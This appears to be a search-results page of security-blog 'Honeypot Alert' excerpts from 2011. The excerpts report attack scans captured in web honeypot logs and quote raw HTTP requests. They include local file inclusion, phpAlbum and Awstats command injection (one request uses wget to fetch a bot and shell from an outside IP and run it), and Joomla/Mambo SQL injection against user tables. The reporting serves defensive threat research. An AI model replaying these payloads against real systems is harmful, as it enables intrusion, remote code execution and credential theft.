Showing 7 results for: December 2011, [Honeypot Alert]

[Honeypot Alert] User Agent Field Arbitrary PHP Code Execution

While reviewing today's web honeypot logs, SpiderLabs Research identified two new attack variations.

Focus on Local File Inclusion attacks

Here are some of the LFI attack payloads identified today:

    GET /_functions.php?prefix=../../../../../../../proc/self/environ%00 HTTP/1.1
    GET /ashnews.php?pathtoashnews=../../../../../../../proc/self/environ%00 HTTP/1.1
    GET /b2-tools/gm-2-b2.php?b2inc=../../../../../../../proc/self/environ%00 HTTP/1.1
    GET /catalog/shopping_cart.php?_ID=../../../../../../../proc/self/environ%00...

[Honeypot Alert] phpAlbum PHP Code Execution Attacks

We have seen a number of scans probing for phpAlbum code execution vulns in our web honeypot logs:

    GET /admin/main.php?cmd=setquality&var1=1%27.system%28%27echo%200wn3d.Nu%27%29.%27; HTTP/1.1
    GET /admin/main.php?cmd=setquality&var1=1%27.system%28%27wget%20http://72.41.115.123/.mods/pbot.txt%20-O%20pb.php;%20php%20pb.php;%20wget%20http://72.41.115.123/.mods/sh.txt%20-O%20h4rd.php%27%29.%27; HTTP/1.1
    GET /album/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1
    GET /albums/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1
    GET /apps/phpalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.0
    GET /apps/phpAlbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.0
    GET /apps/phpalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1
    GET...

[Honeypot Alert] Awstats Command Injection Scanning Detected

Issue Detected

Our daily web honeypot analysis has detected an increase in scanning looking for command injection flaws in the Awstats package. Here are example attacks from the logs:

    GET /awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0
    GET /awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1
    GET /awstats/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.0
    GET /awstats/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d...

[Honeypot Alert] WordPress/Joomla/Mambo SQL Injection Scanning Detected

Our web honeypot analysis today detected scanning looking for SQL Injection flaws in a number of WordPress/Joomla/Mambo components.

    GET /index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=-666%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C1%2C1%2C1%2C0%2C0%2C0%2C0%2C0%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users-- HTTP/1.1
    GET /index.php?option=com_simpleshop&task=browse&Itemid=29&catid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
    GET /index.php?option=com_magazine&task=guide&id=21&page=7&pageid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
    GET /index.php?option=com_volunteer&task=jobs&act=jobshow&Itemid=29&orgs_id=3&filter=&city_id=&function_id=&limit=5&pageno=1&job_id=-9999%2F%2A%2A%2Funion%2F%2A%2A%2Fall%2F%2A%2A%2Fselect%2F%2A%2A%2F0x33633273366962%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C0%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
    GET /index.php?option=com_magazine&task=guide&id=21&page=7&pageid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
    GET /index.php?option=com_rsgallery&page=inline&catid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C2%2C3%2C4%2C0x33633273366962%2C6%2C7%2C8%2C9%2C10%2C11%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos__users-- HTTP/1.1
    GET /index.php?option=com_hwdvideoshare&func=viewcategory&Itemid=61&cat_id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C2%2C0x33633273366962%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C1%2C1%2C1%2C1%2C2%2C2%2C2%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
    GET...